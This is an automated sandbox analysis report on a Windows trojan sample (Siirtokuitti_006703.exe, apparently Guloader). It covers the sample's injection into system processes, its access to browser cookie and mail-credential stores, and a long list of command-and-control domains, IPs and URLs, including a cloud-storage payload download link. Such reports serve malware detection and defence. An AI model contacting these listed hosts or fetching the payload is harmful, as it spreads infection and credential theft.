      Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.23831783488.0000000004460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.23832424466.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts1
      Native API
      1
      DLL Side-Loading
      1
      DLL Side-Loading
      1
      Deobfuscate/Decode Files or Information
      1
      OS Credential Dumping
      2
      File and Directory Discovery
      Remote Services1
      Archive Collected Data
      Exfiltration Over Other Network Medium3
      Ingress Tool Transfer
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      System Shutdown/Reboot
      Default Accounts1
      Shared Modules
      1
      Windows Service
      1
      Access Token Manipulation
      3
      Obfuscated Files or Information
      LSASS Memory4
      System Information Discovery
      Remote Desktop Protocol1
      Data from Local System
      Exfiltration Over Bluetooth11
      Encrypted Channel
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)1
      Windows Service
      1
      DLL Side-Loading
      Security Account Manager221
      Security Software Discovery
      SMB/Windows Admin Shares1
      Email Collection
      Automated Exfiltration4
      Non-Application Layer Protocol
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)711
      Process Injection
      12
      Masquerading
      NTDS12
      Virtualization/Sandbox Evasion
      Distributed Component Object Model1
      Clipboard Data
      Scheduled Transfer5
      Application Layer Protocol
      SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script12
      Virtualization/Sandbox Evasion
      LSA Secrets1
      Process Discovery
      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common1
      Access Token Manipulation
      Cached Domain Credentials1
      Application Window Discovery
      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items711
      Process Injection
      DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 878039 Sample: Siirtokuitti_006703.exe Startdate: 30/05/2023 Architecture: WINDOWS Score: 100 35 www.zinkiggekis.xyz 2->35 37 www.tsygy.com 2->37 39 26 other IPs or domains 2->39 47 Snort IDS alert for network traffic 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 Antivirus detection for URL or domain 2->51 53 5 other signatures 2->53 9 Siirtokuitti_006703.exe 6 46 2->9         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\System.dll, PE32 9->29 dropped 57 Tries to detect Any.run 9->57 13 mstsc.exe 13 9->13         started        16 Siirtokuitti_006703.exe 6 9->16         started        signatures6 process7 dnsIp8 59 Tries to steal Mail credentials (via file / registry access) 13->59 61 Tries to harvest and steal browser information (history, passwords, etc) 13->61 63 Writes to foreign memory regions 13->63 71 3 other signatures 13->71 19 explorer.exe 2 1 13->19 injected 23 firefox.exe 13->23         started        25 RAVCpl64.exe 13->25 injected 31 googlehosted.l.googleusercontent.com 142.250.186.97, 443, 49760 GOOGLEUS United States 16->31 33 drive.google.com 172.217.18.110, 443, 49759 GOOGLEUS United States 16->33 65 Tries to detect Any.run 16->65 67 Maps a DLL or memory area into another process 16->67 69 Sample uses process hollowing technique 16->69 signatures9 process10 dnsIp11 41 www.printmyride.store 130.185.109.77, 49778, 49779, 49780 XIRRADE Germany 19->41 43 scottsteedley.com 162.214.206.200, 49818, 49819, 49820 UNIFIEDLAYER-AS-1US United States 19->43 45 14 other IPs or domains 19->45 55 System process connects to network (likely due to code injection or exploit) 19->55 27 WerFault.exe 2 23->27         started        signatures12 process13

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      Siirtokuitti_006703.exe38%ReversingLabsWin32.Trojan.Guloader
      Siirtokuitti_006703.exe49%VirustotalBrowse
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsl3DD.tmp\System.dll0%ReversingLabs
      No Antivirus matches
      SourceDetectionScannerLabelLink
      roconsultores.com0%VirustotalBrowse
      SourceDetectionScannerLabelLink
      http://www.scottsteedley.com/tchg/?O0qEM=4yLegaT1sivciznwGwL+1oWFxAOSGQRZOQeAHXS5UhA0sXonzOuQC/8xHc6XJGn9K9HBDd08hbjXm0qB4TniN4OVF/4Ot7tkHQ==&CF1Ki=UnDuQcdCFs1MNsvY0%Avira URL Cloudsafe
      http://www.solarwachstum.com/tchg/0%Avira URL Cloudsafe
      http://www.minskadue.xyz/tchg/0%Avira URL Cloudsafe
      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
      http://www.albaymedya.com/tchg/0%Avira URL Cloudsafe
      http://www.printmyride.store/tchg/100%Avira URL Cloudmalware
      http://www.zinkiggekis.xyz/tchg/?O0qEM=mDEdoIjvGdDKka9ru4QwK/GisJWxY9EIyNGATwE/O1GDb08I/XgAMo6lLUTyBtJ+E+b+Hhq9pNT1+wqS6RrKc+0XnVP7aUjPVQ==&CF1Ki=UnDuQcdCFs1MNsvY0%Avira URL Cloudsafe
      http://www.marketing-solution.net/tchg/?O0qEM=Vh+NtSFYOkmwW/joH9vrd5+MSsdMnxV1ssl4yHjdHmi4FIifjhGRd3WP5FLf/k8P5fuqdVgOe83DA0NMx4WBp24AMjol/1MYCA==&CF1Ki=UnDuQcdCFs1MNsvY0%Avira URL Cloudsafe
      http://www.comoparardefumar.website/tchg/?O0qEM=27zP+uSjjQlLnilOnGJCOrnozMlpBRLg3OEmXmWOVdAdyewLZJq+JAgQDNVT6O1S8K/UhNHecCZNR/ARSVl+YwbS8ARBrMbIDw==&CF1Ki=UnDuQcdCFs1MNsvY0%Avira URL Cloudsafe
      http://www.comoparardefumar.website/tchg/0%Avira URL Cloudsafe
      http://www.scottsteedley.com/tchg/0%Avira URL Cloudsafe
      http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
      http://www.cookcollectives.xyz/tchg/?O0qEM=/2jSjcKJMdr4ffgZ+zzkfBSRTsT2SH0igJpEl+3lX4mpJUIOx7Qie7mq5rJzO4NdwHagEWX+5iltx1Pxra2/KdiiiY2yLTCphg==&CF1Ki=UnDuQcdCFs1MNsvY100%Avira URL Cloudmalware
      http://www.albaymedya.com/tchg/?O0qEM=jQDaGZ2OScTGFSP10uKTPyhqI710WSvw2gViBbUugbcSlWDCi533rl6vPGA30o5eyDb36C/pQ3h7az/b16KQNynftoBCqLFM3A==&CF1Ki=UnDuQcdCFs1MNsvY0%Avira URL Cloudsafe
      http://www.arrangeabreak.com/tchg/?2ax=jRqfPy4_lz2&O0qEM=IiqkKM0fZYbcVAhAnum4m1H4t/7jN9R9rdXOIOC6/CZopBQ7QWkcbeNISYKTY0qHDgk4y1fleDCOJFlZ6etMDJwjph9a+HDsvg==0%Avira URL Cloudsafe
      http://www.scottsteedley.com/tchg/?O0qEM=4yLegaT1sivciznwGwL+1oWFxAOSGQRZOQeAHXS5UhA0sXonzOuQC/8xHc6XJGn9K9HBDd08hbjXm0qB4TniN4OVF/4Ot7tkHQ==&2ax=jRqfPy4_lz20%Avira URL Cloudsafe
      http://www.aurizhon.com/tchg/0%Avira URL Cloudsafe
      http://www.dkansai-cp.com/tchg/0%Avira URL Cloudsafe
      http://www.oleictude.xyz/tchg/0%Avira URL Cloudsafe
      http://www.dkansai-cp.com/tchg/?O0qEM=oRufhoY+bc3ycM+VgiODBrp+vj6j24zBH4XRbixJn1DYBt5l7xCYw/uqkQ1xxa9R7WiXu6y4y7mJHWOjUCQ2GcjHOqMUPQqZlA==&CF1Ki=UnDuQcdCFs1MNsvY0%Avira URL Cloudsafe
      http://www.oleictude.xyz/tchg/?2ax=jRqfPy4_lz2&O0qEM=t2tzMhBRWo10Eosyb8KFBuaI1V5h8MV7T2bC3+E0nZXV+FHXmJExWsZaqAHQ5axaFjoD9IuPadSp7WKT8CRkiPajdeOXH8cJLw==0%Avira URL Cloudsafe
      http://www.roconsultores.com/tchg/0%Avira URL Cloudsafe
      http://www.ep09.com/tchg/0%Avira URL Cloudsafe
      http://www.arrangeabreak.com/tchg/0%Avira URL Cloudsafe
      http://www.tsygy.com/tchg/?O0qEM=9bBjY/6oTKgH1shIYNMDEgJDdV7IeHSSKUh5InR8itKuthEKpcsrZfSerFOqB7XzWJrnUJabB2R375fix7bupMFfJVFvNpSnug==&CF1Ki=UnDuQcdCFs1MNsvY0%Avira URL Cloudsafe
      http://www.tsygy.com/tchg/0%Avira URL Cloudsafe
      http://www.minskadue.xyz/tchg/?O0qEM=DJvKcwNMAiJtEMOFKIZqmDIH4j0MfehpVISF4oayj5HJP/icrRLtFKDL2L4p+A5+/b2o2lLyzfTNwEC6FKsE+wfmOuyyDckdRA==&CF1Ki=UnDuQcdCFs1MNsvY0%Avira URL Cloudsafe
      http://www.cookcollectives.xyz/tchg/100%Avira URL Cloudmalware
      http://www.fairbitawayposearisk.com/tchg/0%Avira URL Cloudsafe
      http://www.fairbitawayposearisk.com/tchg/?O0qEM=RUgOIEC2bpKEAb3gt63mE+Z8A/D48vS2kv7pSD36MjRmJGY6VLK565PH5Ya2jxSU9dFBv1ZYes9vP/U9IpvgXfidz0YLsWTogQ==&CF1Ki=UnDuQcdCFs1MNsvY0%Avira URL Cloudsafe
      http://www.ep09.com/tchg/?O0qEM=U7ETdamdP1ZCKOUjEiyRlibAgxYlwKZeBR7oaxwm2PdxgC4EyvOHYU8IW8pd/NQOhWFEBZrGHEgN3MxkyARqzohq8TIPp6MjlQ==&CF1Ki=UnDuQcdCFs1MNsvY0%Avira URL Cloudsafe
      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
      http://www.roconsultores.com/tchg/?O0qEM=BJuKMup2GV76y7PN1TAAeEW5uAzDipAxIHnNePHx/XVxjn7DTtYSqvDx4g/JiwsgTds8bJvsGAi/M/AJ9Pl0F9zoyJQ+vWMQHA==&CF1Ki=UnDuQcdCFs1MNsvY0%Avira URL Cloudsafe
      http://www.zinkiggekis.xyz/tchg/0%Avira URL Cloudsafe
      http://www.1win-legal1.top/tchg/?O0qEM=hClHY5uPluAt04hxdW9YdRNRHUMh6WFBrIjTpWTjcLdbR+/1RzzDBpsx7TGHnuWwBZdLDpA/Bvgz1IX7r92Uvnz5C/OqUTrjUQ==&CF1Ki=UnDuQcdCFs1MNsvY100%Avira URL Cloudmalware
      http://www.marketing-solution.net/tchg/0%Avira URL Cloudsafe
      http://www.aurizhon.com/tchg/?O0qEM=zvsOmuV0RkpNj9dmmLvcNYSUCKV3obfROWhQI5uFrAaJab0t5Tdz/8Us64BcH9fOYlnSp9W3WhuAhk0hcdTywJHY62KLeFNtHg==&CF1Ki=UnDuQcdCFs1MNsvY0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      roconsultores.com
      162.215.249.40
      truetrueunknown
      www.solarwachstum.com
      89.31.143.1
      truetrue
        unknown
        www.oleictude.xyz
        109.123.121.243
        truetrue
          unknown
          fairbitawayposearisk.com
          216.108.231.108
          truetrue
            unknown
            www.printmyride.store
            130.185.109.77
            truetrue
              unknown
              www.marketing-solution.net
              91.195.240.45
              truetrue
                unknown
                www.arifsantoso.info
                45.33.20.235
                truetrue
                  unknown
                  aurizhon.com
                  84.32.84.32
                  truetrue
                    unknown
                    comoparardefumar.website
                    84.32.84.32
                    truetrue
                      unknown
                      www.dkansai-cp.com
                      183.90.238.43
                      truetrue
                        unknown
                        www.zinkiggekis.xyz
                        109.123.121.243
                        truetrue
                          unknown
                          www.tsygy.com
                          23.104.137.185
                          truetrue
                            unknown
                            www.arrangeabreak.com
                            213.171.195.105
                            truetrue
                              unknown
                              albaymedya.com
                              185.106.208.3
                              truetrue
                                unknown
                                drive.google.com
                                172.217.18.110
                                truefalse
                                  high
                                  www.1win-legal1.top
                                  172.67.153.163
                                  truetrue
                                    unknown
                                    www.cookcollectives.xyz
                                    199.192.30.147
                                    truetrue
                                      unknown
                                      www.ep09.com
                                      154.84.88.108
                                      truetrue
                                        unknown
                                        googlehosted.l.googleusercontent.com
                                        142.250.186.97
                                        truefalse
                                          high
                                          www.minskadue.xyz
                                          109.123.121.243
                                          truetrue
                                            unknown
                                            scottsteedley.com
                                            162.214.206.200
                                            truetrue
                                              unknown
                                              www.comoparardefumar.website
                                              unknown
                                              unknowntrue
                                                unknown
                                                www.albaymedya.com
                                                unknown
                                                unknowntrue
                                                  unknown
                                                  www.roconsultores.com
                                                  unknown
                                                  unknowntrue
                                                    unknown
                                                    doc-04-7k-docs.googleusercontent.com
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      www.aurizhon.com
                                                      unknown
                                                      unknowntrue
                                                        unknown
                                                        www.14-pro-max-sales.online
                                                        unknown
                                                        unknowntrue
                                                          unknown
                                                          www.scottsteedley.com
                                                          unknown
                                                          unknowntrue
                                                            unknown
                                                            www.fairbitawayposearisk.com
                                                            unknown
                                                            unknowntrue
                                                              unknown
                                                              NameMaliciousAntivirus DetectionReputation
                                                              http://www.albaymedya.com/tchg/true
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.comoparardefumar.website/tchg/?O0qEM=27zP+uSjjQlLnilOnGJCOrnozMlpBRLg3OEmXmWOVdAdyewLZJq+JAgQDNVT6O1S8K/UhNHecCZNR/ARSVl+YwbS8ARBrMbIDw==&CF1Ki=UnDuQcdCFs1MNsvYtrue
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.zinkiggekis.xyz/tchg/?O0qEM=mDEdoIjvGdDKka9ru4QwK/GisJWxY9EIyNGATwE/O1GDb08I/XgAMo6lLUTyBtJ+E+b+Hhq9pNT1+wqS6RrKc+0XnVP7aUjPVQ==&CF1Ki=UnDuQcdCFs1MNsvYtrue
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.comoparardefumar.website/tchg/true
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://doc-04-7k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/k5vv2eer5piasl85vm2gu1ubr744dkes/1685437575000/04063919605701821530/*/1gvJNG_hcxbVMWQvESL5VmHgfKw3TSb3S?e=download&uuid=0165319d-d6ed-4364-9b74-a19685a5f726false
                                                                high
                                                                http://www.scottsteedley.com/tchg/?O0qEM=4yLegaT1sivciznwGwL+1oWFxAOSGQRZOQeAHXS5UhA0sXonzOuQC/8xHc6XJGn9K9HBDd08hbjXm0qB4TniN4OVF/4Ot7tkHQ==&CF1Ki=UnDuQcdCFs1MNsvYtrue
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.printmyride.store/tchg/true
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                http://www.minskadue.xyz/tchg/true
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.solarwachstum.com/tchg/true
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.marketing-solution.net/tchg/?O0qEM=Vh+NtSFYOkmwW/joH9vrd5+MSsdMnxV1ssl4yHjdHmi4FIifjhGRd3WP5FLf/k8P5fuqdVgOe83DA0NMx4WBp24AMjol/1MYCA==&CF1Ki=UnDuQcdCFs1MNsvYtrue
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.cookcollectives.xyz/tchg/?O0qEM=/2jSjcKJMdr4ffgZ+zzkfBSRTsT2SH0igJpEl+3lX4mpJUIOx7Qie7mq5rJzO4NdwHagEWX+5iltx1Pxra2/KdiiiY2yLTCphg==&CF1Ki=UnDuQcdCFs1MNsvYtrue
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                http://www.arrangeabreak.com/tchg/?2ax=jRqfPy4_lz2&O0qEM=IiqkKM0fZYbcVAhAnum4m1H4t/7jN9R9rdXOIOC6/CZopBQ7QWkcbeNISYKTY0qHDgk4y1fleDCOJFlZ6etMDJwjph9a+HDsvg==true
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.scottsteedley.com/tchg/true
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.dkansai-cp.com/tchg/true
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.dkansai-cp.com/tchg/?O0qEM=oRufhoY+bc3ycM+VgiODBrp+vj6j24zBH4XRbixJn1DYBt5l7xCYw/uqkQ1xxa9R7WiXu6y4y7mJHWOjUCQ2GcjHOqMUPQqZlA==&CF1Ki=UnDuQcdCFs1MNsvYtrue
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.albaymedya.com/tchg/?O0qEM=jQDaGZ2OScTGFSP10uKTPyhqI710WSvw2gViBbUugbcSlWDCi533rl6vPGA30o5eyDb36C/pQ3h7az/b16KQNynftoBCqLFM3A==&CF1Ki=UnDuQcdCFs1MNsvYtrue
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.oleictude.xyz/tchg/true
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.scottsteedley.com/tchg/?O0qEM=4yLegaT1sivciznwGwL+1oWFxAOSGQRZOQeAHXS5UhA0sXonzOuQC/8xHc6XJGn9K9HBDd08hbjXm0qB4TniN4OVF/4Ot7tkHQ==&2ax=jRqfPy4_lz2true
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.aurizhon.com/tchg/true
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.oleictude.xyz/tchg/?2ax=jRqfPy4_lz2&O0qEM=t2tzMhBRWo10Eosyb8KFBuaI1V5h8MV7T2bC3+E0nZXV+FHXmJExWsZaqAHQ5axaFjoD9IuPadSp7WKT8CRkiPajdeOXH8cJLw==true
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.roconsultores.com/tchg/true
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.ep09.com/tchg/true
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.cookcollectives.xyz/tchg/true
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                http://www.tsygy.com/tchg/?O0qEM=9bBjY/6oTKgH1shIYNMDEgJDdV7IeHSSKUh5InR8itKuthEKpcsrZfSerFOqB7XzWJrnUJabB2R375fix7bupMFfJVFvNpSnug==&CF1Ki=UnDuQcdCFs1MNsvYtrue
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.arrangeabreak.com/tchg/true
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.minskadue.xyz/tchg/?O0qEM=DJvKcwNMAiJtEMOFKIZqmDIH4j0MfehpVISF4oayj5HJP/icrRLtFKDL2L4p+A5+/b2o2lLyzfTNwEC6FKsE+wfmOuyyDckdRA==&CF1Ki=UnDuQcdCFs1MNsvYtrue
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.tsygy.com/tchg/true
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.fairbitawayposearisk.com/tchg/true
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.fairbitawayposearisk.com/tchg/?O0qEM=RUgOIEC2bpKEAb3gt63mE+Z8A/D48vS2kv7pSD36MjRmJGY6VLK565PH5Ya2jxSU9dFBv1ZYes9vP/U9IpvgXfidz0YLsWTogQ==&CF1Ki=UnDuQcdCFs1MNsvYtrue
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.ep09.com/tchg/?O0qEM=U7ETdamdP1ZCKOUjEiyRlibAgxYlwKZeBR7oaxwm2PdxgC4EyvOHYU8IW8pd/NQOhWFEBZrGHEgN3MxkyARqzohq8TIPp6MjlQ==&CF1Ki=UnDuQcdCFs1MNsvYtrue
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.roconsultores.com/tchg/?O0qEM=BJuKMup2GV76y7PN1TAAeEW5uAzDipAxIHnNePHx/XVxjn7DTtYSqvDx4g/JiwsgTds8bJvsGAi/M/AJ9Pl0F9zoyJQ+vWMQHA==&CF1Ki=UnDuQcdCFs1MNsvYtrue
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.zinkiggekis.xyz/tchg/true
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.1win-legal1.top/tchg/?O0qEM=hClHY5uPluAt04hxdW9YdRNRHUMh6WFBrIjTpWTjcLdbR+/1RzzDBpsx7TGHnuWwBZdLDpA/Bvgz1IX7r92Uvnz5C/OqUTrjUQ==&CF1Ki=UnDuQcdCFs1MNsvYtrue
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                http://www.marketing-solution.net/tchg/true
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.aurizhon.com/tchg/?O0qEM=zvsOmuV0RkpNj9dmmLvcNYSUCKV3obfROWhQI5uFrAaJab0t5Tdz/8Us64BcH9fOYlnSp9W3WhuAhk0hcdTywJHY62KLeFNtHg==&CF1Ki=UnDuQcdCFs1MNsvYtrue
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                https://doc-04-7k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/k5vv2eerSiirtokuitti_006703.exe, 00000003.00000003.19287599564.000000000765D000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19281692480.000000000765D000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19286262605.000000000765D000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19276888205.0000000007678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.Siirtokuitti_006703.exe, 00000003.00000001.19133084777.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://nsis.sf.net/NSIS_ErrorErrorSiirtokuitti_006703.exe, 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Siirtokuitti_006703.exe, 00000001.00000000.18764879209.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Siirtokuitti_006703.exe, 00000003.00000000.19131681652.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                                                                    high
                                                                    http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDSiirtokuitti_006703.exe, 00000003.00000001.19133084777.0000000000626000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                      high
                                                                      http://www.gopher.ftp://ftp.Siirtokuitti_006703.exe, 00000003.00000001.19133084777.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.google.comSiirtokuitti_006703.exe, 00000003.00000003.19276888205.0000000007678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://doc-04-7k-docs.googleusercontent.com/ISiirtokuitti_006703.exe, 00000003.00000003.19287599564.000000000765D000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19281692480.000000000765D000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19286262605.000000000765D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://doc-04-7k-docs.googleusercontent.com/Siirtokuitti_006703.exe, 00000003.00000003.19287599564.000000000765D000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19281692480.000000000765D000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19286262605.000000000765D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Siirtokuitti_006703.exe, 00000003.00000001.19133084777.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://apis.google.comSiirtokuitti_006703.exe, 00000003.00000003.19276888205.0000000007678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              130.185.109.77
                                                                              www.printmyride.storeGermany
                                                                              51191XIRRADEtrue
                                                                              84.32.84.32
                                                                              aurizhon.comLithuania
                                                                              33922NTT-LT-ASLTtrue
                                                                              183.90.238.43
                                                                              www.dkansai-cp.comJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                                              91.195.240.45
                                                                              www.marketing-solution.netGermany
                                                                              47846SEDO-ASDEtrue
                                                                              109.123.121.243
                                                                              www.oleictude.xyzUnited Kingdom
                                                                              13213UK2NET-ASGBtrue
                                                                              162.214.206.200
                                                                              scottsteedley.comUnited States
                                                                              46606UNIFIEDLAYER-AS-1UStrue
                                                                              199.192.30.147
                                                                              www.cookcollectives.xyzUnited States
                                                                              22612NAMECHEAP-NETUStrue
                                                                              154.84.88.108
                                                                              www.ep09.comSeychelles
                                                                              134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                                              216.108.231.108
                                                                              fairbitawayposearisk.comUnited States
                                                                              26277PREMIANETUStrue
                                                                              89.31.143.1
                                                                              www.solarwachstum.comGermany
                                                                              15598QSC-AG-IPXDEtrue
                                                                              162.215.249.40
                                                                              roconsultores.comUnited States
                                                                              394695PUBLIC-DOMAIN-REGISTRYUStrue
                                                                              172.67.153.163
                                                                              www.1win-legal1.topUnited States
                                                                              13335CLOUDFLARENETUStrue
                                                                              23.104.137.185
                                                                              www.tsygy.comUnited States
                                                                              395954LEASEWEB-USA-LAX-11UStrue
                                                                              172.217.18.110
                                                                              drive.google.comUnited States
                                                                              15169GOOGLEUSfalse
                                                                              142.250.186.97
                                                                              googlehosted.l.googleusercontent.comUnited States
                                                                              15169GOOGLEUSfalse
                                                                              185.106.208.3
                                                                              albaymedya.comTurkey
                                                                              42846GUZELHOSTINGGNETINTERNETTELEKOMUNIKASYONASTRtrue
                                                                              213.171.195.105
                                                                              www.arrangeabreak.comUnited Kingdom
                                                                              8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                              Joe Sandbox Version:37.1.0 Beryl
                                                                              Analysis ID:878039
                                                                              Start date and time:2023-05-30 11:04:05 +02:00
                                                                              Joe Sandbox Product:CloudBasic
                                                                              Overall analysis duration:0h 17m 52s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                              Number of analysed new started processes analysed:18
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:2
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • HDC enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample file name:Siirtokuitti_006703.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@8/9@23/17
                                                                              EGA Information:
                                                                              • Successful, ratio: 66.7%
                                                                              HDC Information:
                                                                              • Successful, ratio: 5.7% (good quality ratio 5.5%)
                                                                              • Quality average: 82.7%
                                                                              • Quality standard deviation: 25.4%
                                                                              HCA Information:
                                                                              • Successful, ratio: 96%
                                                                              • Number of executed functions: 104
                                                                              • Number of non-executed functions: 136
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 20.190.159.71, 40.126.31.69, 20.190.159.68, 40.126.31.71, 20.190.159.75, 20.190.159.64, 20.190.159.0, 20.190.159.73
